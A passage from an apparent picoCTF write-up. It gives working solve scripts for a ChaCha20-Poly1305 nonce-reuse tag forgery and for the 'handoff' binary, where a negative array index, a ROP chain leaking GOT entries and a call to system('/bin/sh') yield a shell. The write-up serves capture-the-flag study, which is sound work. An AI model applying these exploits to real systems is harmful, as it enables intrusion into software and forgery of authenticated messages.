    """Return padding for the Associated Authenticated Data"""
    #print(data, type(data))
    if len(data) % 16 == 0:
        return bytes(0)
    else:
        return bytes(16-(len(data)%16))
def get_blocks(c):
    # empty associated data, so only the ciphertext and the two lengths are MACed
    data = b""
    mac_data = c + pad16(c)
    mac_data += struct.pack('<Q', len(data))
    mac_data += struct.pack('<Q', len(c))
    c = mac_data
    real_c = []
    for i in range(0, len(c), 16):
        n = c[i:i+16]
        n = n + b'\x01'
        n += (17-len(n)) * b'\x00'
        assert len(n) == 17
        real_c.append(int.from_bytes(n, byteorder='little'))
    return real_c
def tag(c, r, s):
    mod2 = 2**128
    real_c = get_blocks(c)
    c = real_c
    n = len(c)
    res = 0
    for i in range(n):
        res += c[i]
        res = (r*res) % P
    return (res + s) % mod2
def atk(pair1, pair2, nonce, m3):
    m1, c1, t1 = pair1
    m2, c2, t2 = pair2
    t1 = int.from_bytes(t1, byteorder='little')
    t2 = int.from_bytes(t2, byteorder='little')
    keystream = bytes(a ^ b for a, b in zip(c1, m1))
    c3 = bytes(a ^ b for a, b in zip(m3, keystream))
    # build both MAC polynomials in the symbolic variable x
    f1 = 0
    f2 = 0
    for i in get_blocks(c1):
        f1 += i
        f1 *= x
    for i in get_blocks(c2):
        f2 += i
        f2 *= x
    rs = []
    for k in range(-4, 5):
        rhs = t1 - t2 + 2**128 * k
        f = rhs - (f1 - f2)
        for r, _ in f.roots():
            # keep only roots that satisfy the Poly1305 clamping of r
            if int(r) & 0x0ffffffc0ffffffc0ffffffc0fffffff == int(r):
                s = (t1 - int(f1(r))) % 2**128
                rs.append((r, s))
    r, s = map(int, rs[0])
    t3 = tag(c3, r, s)
    # fixed-width encoding, so a tag with leading zero bytes stays 16 bytes long
    t3 = t3.to_bytes(16, byteorder='little')
    return c3, t3
messages = [
b"Did you know that ChaCha20-Poly1305 is an authenticated encryption algorithm?",
b"That means it protects both the confidentiality and integrity of data!"
]
goal = "But it's only secure if used correctly!"
# io = remote("activist-birds.picoctf.net", 61677)
io = process(['python3', 'picoserver.py'])
io.recvuntil(b"Ciphertext (hex): ")
a = io.recvline().strip().decode()
c1 = bytes.fromhex(a)
io.recvuntil(b"Ciphertext (hex): ")
a = io.recvline().strip().decode()
c2 = bytes.fromhex(a)
def extract(pkt):
    ct = pkt[:-28]
    tag = pkt[-28:-12]
    nonce = pkt[-12:]
    return ct, tag, nonce
c1, t1, n1 = extract(c1)
c2, t2, n2 = extract(c2)
n = n1
m1, m2 = messages
m3 = goal.encode()
c3, t3 = atk((m1, c1, t1), (m2, c2, t2), n, m3)
forged = c3 + t3 + n
io.sendline(forged.hex())
io.interactive()
```
## handoff
Looking at the source, we can see an obvious buffer overflow into the feedback array. However, using the buffer overflow we can control `rbp`, `rip`, and nothing else. While this is exploitable, it is annoying and not very fun. Instead we exploit the negative indexing into the `entries` array, which lets us write more data. Writing to `entries[-1]` allows you to overwrite the `fgets` return address and set up a ROP chain in `entries[0]`. Since the binary is compiled without PIE, we don't need to leak anything to do ROP. The handout does not provide the remote libc, so we leak GOT entries using a ROP chain `pop rdi ; puts`. Throwing the leaked addresses into `libc.rip` gives hits for `ubuntu 2.35`. Now we can calculate the libc base from the leaks and pop a shell with `system("/bin/sh")`.
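The leak-to-base arithmetic is simple enough to show on its own. A small sketch without pwntools, using the sample `fgets` leak and the `0x7f380` offset that appear in the solve script; `parse_leak` is a hypothetical helper that does what `u64(... .ljust(8, b"\x00"))` does there.

```python
import struct

FGETS_OFFSET = 0x7f380  # offset of fgets in the matched libc, taken from the solve script


def parse_leak(line: bytes) -> int:
    """puts() stops at the first NUL byte, so pad the leaked bytes back to 8."""
    raw = line[:-1]  # drop the trailing newline added by puts
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


# the sample leak from the script comments, as it would arrive on the wire
line = bytes.fromhex("807379f9ef71") + b"\n"
leak = parse_leak(line)
libc_base = leak - FGETS_OFFSET
print(hex(leak), hex(libc_base))
```

A page-aligned result is a quick sanity check that the libc guess is right.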
### solve script
```py=
from pwn import *
context.terminal = ["kitty"]
context.binary = file = ELF("./handoff")
libc = ELF("./libc.so.6")
script = """
# b *0x0040136e
# b *fgets+0xfe
c
"""
if not args.REMOTE:
    p = gdb.debug("./handoff", gdbscript=script)
def add(name: bytes):
    p.sendlineafter(b"app\n", b"1")
    p.sendlineafter(b": \n", name)
def edit(idx: int, data: bytes):
    p.sendlineafter(b"app\n", b"2")
    p.sendlineafter(b"?\n", f"{idx}".encode())
    p.sendlineafter(b"?\n", data)
poprdi = 0x0000000000401473
puts = 0x00401090
def connect():
    if args.REMOTE:
        return remote("shape-facility.picoctf.net", "50867")
def arbread(addr: int):
    # global p
    # p = connect()
    payload = flat({
        0x00: poprdi + 1,
        0x08: poprdi + 1,
        0x10: p64(number=file.sym.main)
    })
    add(payload)
    payload = flat({
        0x28: poprdi,
        0x30: addr,
        0x38: puts,
    })
    edit(-1, payload)
    leak = u64(p.recvline()[:-1].ljust(8, b"\x00"))
    log.info(f"{leak = :#x}")
    # p.close()
    return leak
# arbread(file.got.fgets) 0x71eff9797380
# arbread(file.got.puts) # 0x7992b5c88380
# arbread(file.got.getchar) # 0x7476c2d32380
# arbread(file.got.fflush) # 0x7a1490b36380
# arbread(file.got.setvbuf) # 0x7e85d23cb380
if args.REMOTE:
    p = connect()
fgets = arbread(file.got.fgets)
libcbase = fgets - 0x7f380
libc.address = libcbase
log.info(f"{libcbase = :#x}")
# adjusted = (fgets - 0x80000) & ~0xfff
# arbread(fgets)
p.recvuntil(b"option\n")
payload = flat({
    0x00: libc.sym.system
})
add(payload)
payload = flat({
    0x28: poprdi,
    0x30: next(libc.search(b"/bin/sh\x00")),
    0x38: poprdi + 1,
})
edit(-1, payload)
p.interactive()
```